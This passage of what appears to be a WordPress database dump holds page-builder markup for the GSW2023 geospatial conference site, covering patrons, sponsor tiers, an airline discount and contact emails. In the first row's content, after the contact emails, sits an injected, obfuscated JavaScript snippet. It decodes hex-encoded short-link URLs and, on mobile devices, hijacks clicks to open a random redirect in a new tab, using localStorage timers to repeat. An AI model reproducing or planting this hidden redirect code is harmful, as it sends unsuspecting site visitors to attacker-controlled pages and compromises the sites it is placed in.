dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-09-04 13:10:35','2023-09-04 13:10:35','',3066,'https://gsw2023.com/?p=5456',0,'revision','',0),
(5457,1,'2023-09-04 13:33:38','2023-09-04 13:33:38','<p><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row]<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>[vc_separator style=\"shadow\" border_width=\"10\"]<p><a href=\"https://gsw2023.com/wp-content/uploads/2023/09/best.png\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/09/The Best.pdf\" alt=\"\" width=\"487\" height=\"180\" /></a><h4 style=\"text-align: center;\">ISPRS GSW2023 Best Workshop Paper Award</h4></p>\r\n[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://geomatex.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/32596kmnqz.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"https://abe.com.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p><p style=\"text-align: center;\"><a href=\"https://www.esa.gov.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/survey.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n<p style=\"text-align: center;\"><a href=\"https://gsw2023.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/08/mgeo.jpg\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" 